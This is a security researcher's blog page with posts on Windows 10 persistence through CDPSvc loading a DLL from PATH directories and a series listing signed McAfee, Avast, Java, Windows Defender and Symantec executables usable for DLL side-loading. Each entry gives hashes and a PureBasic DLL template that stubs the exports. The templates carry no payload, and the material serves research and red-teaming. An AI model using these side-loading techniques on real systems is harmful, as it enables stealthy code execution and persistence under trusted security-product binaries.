Windows 10 Persistence via PATH directories - CDPSvc

2019-01-13 00:00:00 +0000

TL;DR: CDPSvc searches the file cdpsgshims.dll inside PATH directories and loads it if found.

CDPSvc is the Connected Devices Platform Service, enabled by default under Windows 10 (since 1607). If an attacker is able to write in any directory specified in the system PATH, this allows to persist on the system as NT AUTHORITY\LocalService.

The issue is not considered a security-vulnerability, but rather a security-relevant misconfiguration. With a default Windows installation, there can’t be a non-admin directory in the PATH, so this can’t be exploited.

Download: A sample DLL (source included) that executes calc.exe is available here: CDPSvcPersist


DLL Side-Loading for Fun (and Profit?) - Day 7

2019-01-07 00:00:00 +0000

TL;DR: see Part 1 for an introduction to this series and an overview of the available posts.

To continue with the leaders in security information and event management we can use the FWInstCheck.exe tool included in the McAfee Endpoint Security product to side-load our own code.

  • Name: McAfee Endpoint Security (x64)
  • Executable: FWInstCheck.exe
  • SHA256: 1ea5f32debb79f98c23918e8c246eddab323b2760696abbeafaf30c454c39982
  • SHA1: fe00e9375ac7fb3ca90ae7ed3fcd9670a3575409
  • MD5: a872d5f425658524b7dbc8972f670042
  • Certificate: McAfee, Inc./VeriSign Class 3 Code Signing 2010 CA/VeriSign Class 3 Public Primary Certification Authority - G5

DLL-Template:

; ***************************************************************************
; *                                                                         *
; * Author:      marpie ([email protected])                                *
; * License:     BSD 2-clause                                               *
; * Copyright:   (c) 2019, a12d404.net                                      *
; * Status:      Prototype                                                  *
; * Created:     20190107                                                   *
; * Last Update: 20190107                                                   *
; *                                                                         *
; ***************************************************************************
EnableExplicit

; ---------------------------------------------------------------------------
;- Prototypes
Macro LoopForever()
  Sleep_(-1)
EndMacro

Macro DbgOutFunctionName()
  OutputDebugString_("Func: " + #PB_Compiler_Procedure)
EndMacro

Macro DummyExport(proc_name)
  ProcedureDLL proc_name()
    DbgOutFunctionName()
    LoopForever()
  EndProcedure
EndMacro

; ---------------------------------------------------------------------------
;- Exports: cryptbase.dll - FWInstCheck.exe (McAfee Firewall Installer check exe)

DummyExport(SystemFunction001)
DummyExport(SystemFunction002)
DummyExport(SystemFunction003)
DummyExport(SystemFunction004)
DummyExport(SystemFunction005)
DummyExport(SystemFunction028)
DummyExport(SystemFunction029)
DummyExport(SystemFunction034)
DummyExport(SystemFunction036)
DummyExport(SystemFunction040)
DummyExport(SystemFunction041)

; ---------------------------------------------------------------------------

DummyExport(AttachProcess) ; -- just to block on AttachProcess...

ProcedureDLL DetachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL AttachThread(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachThread(Instance)
  DbgOutFunctionName()
EndProcedure

Download: I do not provide the executables in question as they can easily be found on the Internet and I don’t want any eager companies to send me DMCA take-down letters ;-). Hybrid Analysis / reverse.it or VirusTotal are always happy to help with downloads for these files…

A description of all executables will be collected on Github: signed-loaders


DLL Side-Loading for Fun (and Profit?) - Day 5 & 6

2019-01-06 00:00:00 +0000

TL;DR: see Part 1 for an introduction to this series and an overview of the available posts.

Since I forgot to post yesterday, I merged the two posts. So below you’ll find DLL side-loading targets using Oracle Java and Avast Antivirus Business.

For Oracle Java the DLL-Template is provided below. For the Avast target, just create a DLL (wsc.dll) with one export (called [email protected]) and execute wsc_proxy.exe.

Avast Antivirus Business (x86)

  • Name: Avast - Antivirus Business(x86)
  • Executable: wsc_proxy.exe
  • SHA256: 81aa1e5578e99de5d99d775910704aa1e92b50139fc1a1a9a5fb1d60a3a7897e
  • SHA1: 03aaf714728eae7ba833bdf36be15a3136f4bb46
  • MD5: 39f551472d83951eae833db975991219
  • Certificate: AVAST Software s.r.o./DigiCert High Assurance Code Signing CA-1/DigiCert High Assurance EV Root CA

Oracle Java (x64)

DLL-Template (Java):

EnableExplicit

; ---------------------------------------------------------------------------
;- Prototypes
Macro LoopForever()
  Sleep_(-1)
EndMacro

Macro DbgOutFunctionName()
  OutputDebugString_("Func: " + #PB_Compiler_Procedure)
EndMacro

Macro DummyExport(proc_name)
  ProcedureDLL proc_name()
    DbgOutFunctionName()
    LoopForever()
  EndProcedure
EndMacro

; ---------------------------------------------------------------------------
;- Exports: deploy.dll - javacpl.exe

DummyExport(GetCurrentJavaHomeFromRegistry)

; ---------------------------------------------------------------------------
;- Exports: jli.dll for java-rmi.exe and others

DummyExport(JLI_CmdToArgs)
DummyExport(JLI_GetStdArgc)
DummyExport(JLI_GetStdArgs)
DummyExport(JLI_Launch)
DummyExport(JLI_MemAlloc)

; ---------------------------------------------------------------------------

ProcedureDLL AttachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL AttachThread(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachThread(Instance)
  DbgOutFunctionName()
EndProcedure

Download: I do not provide the executables in question as they can easily be found on the Internet and I don’t want any eager companies to send me DMCA take-down letters ;-). Hybrid Analysis / reverse.it or VirusTotal are always happy to help with downloads for these files…

A description of all executables will be collected on Github: signed-loaders


DLL Side-Loading for Fun (and Profit?) - Day 4

2019-01-04 00:00:00 +0000

TL;DR: see Part 1 for an introduction to this series and an overview of the available posts.

My all time favorite side-loading target is Windows Defender, as most of the time the executable (MsMpEng.exe) is already on the system and you only need to place your DLL, with one export (ServiceCrtMain), in the right folder and copy the executable.

  • Name: Microsoft Windows Defender (x64)
  • Executable: MsMpEng.exe
  • SHA256: a72ea60be2adb8f15bbec86910dc1c1f41abe888fb87b1f3f902dcaa85e774f6
  • SHA1: fdb29638944a097d83c8c3442970287a890a0a03
  • MD5: ed70edcc4107f3727973c312e0049bd5
  • Certificate: Microsoft Corporation/Microsoft Code Signing PCA/Microsoft Root Certificate Authority

  • Name: Microsoft Windows Defender (x32)
  • Executable: MsMpEng.exe
  • SHA256: 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
  • SHA1: 3d409b39b8502fcd23335a878f2cbdaf6d721995
  • MD5: 8cc83221870dd07144e63df594c391d9
  • Certificate: Microsoft Corporation/Microsoft Code Signing PCA/Microsoft Root Certificate Authority

DLL-Template:

; ***************************************************************************
; *                                                                         *
; * Author:      marpie ([email protected])                                *
; * License:     BSD 2-clause                                               *
; * Copyright:   (c) 2019, a12d404.net                                      *
; * Status:      Prototype                                                  *
; * Created:     20190104                                                   *
; * Last Update: 20190104                                                   *
; *                                                                         *
; ***************************************************************************
EnableExplicit

; ---------------------------------------------------------------------------
;- Prototypes
Macro LoopForever()
  Sleep_(-1)
EndMacro

Macro DbgOutFunctionName()
  OutputDebugString_("Func: " + #PB_Compiler_Procedure)
EndMacro

Macro DummyExport(proc_name)
  ProcedureDLL proc_name()
    DbgOutFunctionName()
    LoopForever()
  EndProcedure
EndMacro

; ---------------------------------------------------------------------------
;- Exports: mpsvc.dll - MsMpEng.exe (Microsoft Malware Protection Antimalware Service Executable)

DummyExport(ServiceCrtMain)

; ---------------------------------------------------------------------------

ProcedureDLL AttachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL AttachThread(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachThread(Instance)
  DbgOutFunctionName()
EndProcedure

Download: I do not provide the executables in question as they can easily be found on the Internet and I don’t want any eager companies to send me DMCA take-down letters ;-). Hybrid Analysis / reverse.it or VirusTotal are always happy to help with downloads for these files…

A description of all executables will be collected on Github: signed-loaders


DLL Side-Loading for Fun (and Profit?) - Day 3

2019-01-03 00:00:00 +0000

TL;DR: see Part 1 for an introduction to this series and an overview of the available posts.

Today we have some fun with Symantec, as their Symantec Endpoint Protection Manager provides us with two Loaders and one signed (outdated) PHP version that we can use for side-loading via php5.dll and the exports below (see template).

  • Name: Symantec - Symantec Endpoint Protection Manager(x86)
  • Executable: php-win.exe
  • SHA256: 20790464a0eac6d2459dae4b23fa8f46c48f9b9ea797f1af6870bf80253d680a
  • SHA1: af15e83af6c5c923d2f8788477c25d15790f944f
  • MD5: 30e32444dc23b3a620f698dee1f21749
  • Certificate: Symantec Corporation/VeriSign Class 3 Code Signing 2010 CA/VeriSign Class 3 Public Primary Certification Authority - G5

  • Name: Symantec - Symantec Endpoint Protection Manager(x86)
  • Executable: SaSetupWrapper.exe
  • SHA256: 8a0f418918e85183c899682ec6016f1c0f5da50ac2a39a39d27b50275aacedea
  • SHA1: 7991234464368fc10131bf937f7d7aecb9627da4
  • MD5: 89eee4675e3aef28ea8cc425f33410c7
  • Certificate: Symantec Corporation/VeriSign Class 3 Code Signing 2010 CA/VeriSign Class 3 Public Primary Certification Authority - G5

  • Name: Symantec - Symantec Endpoint Protection Manager(x86)
  • Executable: WinExec.exe
  • SHA256: ba627a7f09c24b617884e303b4c4b4a92b1f2f78ac45a24ac21b5d27b387c457
  • SHA1: 4f5f19c914fc47bb472ce306820a5f86e0c181d4
  • MD5: f95b6fb7ba455d76d647b6a67b7f5cf3
  • Certificate: Symantec Corporation/VeriSign Class 3 Code Signing 2010 CA/VeriSign Class 3 Public Primary Certification Authority - G5

Loaders:

  • WinExec.exe calc.exe
  • SaSetupWrapper.exe which loads setup.exe in the same folder

DLL-Template:

; ***************************************************************************
; *                                                                         *
; * Author:      marpie ([email protected])                                *
; * License:     BSD 2-clause                                               *
; * Copyright:   (c) 2019, a12d404.net                                      *
; * Status:      Prototype                                                  *
; * Created:     20190103                                                   *
; * Last Update: 20190103                                                   *
; *                                                                         *
; ***************************************************************************
EnableExplicit

; ---------------------------------------------------------------------------
;- Prototypes
Macro LoopForever()
  Sleep_(-1)
EndMacro

Macro DbgOutFunctionName()
  OutputDebugString_("Func: " + #PB_Compiler_Procedure)
EndMacro

Macro DummyExport(proc_name)
  ProcedureDLL proc_name()
    DbgOutFunctionName()
    LoopForever()
  EndProcedure
EndMacro

; ---------------------------------------------------------------------------
;- Exports: php5.dll - php-win.exe (Symantec Endpoint Protection Manager)

DummyExport(php_error_docref0)
DummyExport(zend_parse_parameters)
DummyExport(php_ini_scanned_files)
DummyExport(php_ini_scanned_path)
DummyExport(php_ini_opened_path)
DummyExport(zend_extensions)
DummyExport(reflection_zend_extension_ptr)
DummyExport(reflection_extension_ptr)
DummyExport(reflection_method_ptr)
DummyExport(reflection_class_ptr)
DummyExport(reflection_function_ptr)
DummyExport(reflection_ptr)
DummyExport(php_import_environment_variables)
DummyExport(sapi_globals)
DummyExport(sapi_module)
DummyExport(core_globals)
DummyExport(module_registry)
DummyExport(executor_globals)
DummyExport(compiler_globals)
DummyExport(zend_printf)
DummyExport(php_getopt)
DummyExport(zend_exception_get_default)
DummyExport(php_info_print_module)
DummyExport(php_print_info)
DummyExport(php_get_highlight_struct)
DummyExport(zend_strip)
DummyExport(zend_highlight)
DummyExport(php_lint_script)
DummyExport(php_execute_script)
DummyExport(php_module_shutdown)
DummyExport(php_module_startup)
DummyExport(php_request_shutdown)
DummyExport(php_request_startup)
DummyExport(zend_load_extension)
DummyExport(zend_call_method)
DummyExport(php_register_variable)
DummyExport(sapi_deactivate)
DummyExport(sapi_shutdown)
DummyExport(sapi_startup)
DummyExport(zend_register_constant)
DummyExport(tsrm_realpath)
DummyExport(display_ini_entries)
DummyExport(zend_ini_deactivate)
DummyExport(_php_stream_open_wrapper_ex)
DummyExport(_php_stream_get_line)
DummyExport(_php_stream_free)
DummyExport(php_output_end_all)
DummyExport(php_output_write)
DummyExport(php_printf)
DummyExport(_object_init_ex)
DummyExport(zend_read_property)
DummyExport(zend_eval_string_ex)
DummyExport(zend_is_auto_global)
DummyExport(open_file_for_scanning)
DummyExport(zend_qsort)
DummyExport(_zval_ptr_dtor)
DummyExport(zend_str_tolower_dup)
DummyExport(gc_remove_zval_from_buffer)
DummyExport(get_zend_version)
DummyExport(zend_llist_sort)
DummyExport(zend_llist_apply)
DummyExport(zend_llist_copy)
DummyExport(zend_llist_destroy)
DummyExport(zend_hash_sort)
DummyExport(zend_hash_copy)
DummyExport(zend_hash_find)
DummyExport(zend_hash_apply)
DummyExport(_zend_hash_add_or_update)
DummyExport(zend_hash_destroy)
DummyExport(_zend_hash_init)
DummyExport(_estrndup)
DummyExport(_efree)
DummyExport(_emalloc)
DummyExport(zend_strndup)
DummyExport(zif_dl)
DummyExport(zend_error)
DummyExport(php_module_shutdown_wrapper)

; ---------------------------------------------------------------------------

ProcedureDLL AttachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL AttachThread(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachThread(Instance)
  DbgOutFunctionName()
EndProcedure

Download: I do not provide the executables in question as they can easily be found on the Internet and I don’t want any eager companies to send me DMCA take-down letters ;-). Hybrid Analysis / reverse.it or VirusTotal are always happy to help with downloads for these files…

A description of all executables will be collected on Github: signed-loaders


About this site // disclaimer

This is my personal blog. The views expressed on these pages are mine alone and not those of my employer or former employers. As with time views may change and become outdated and even invalid and therefore may not represent my current views. All information is provided as-is. If not otherwise stated the content is provided under the 2-clause BSD License.

Follow me on Twitter @markus_pieton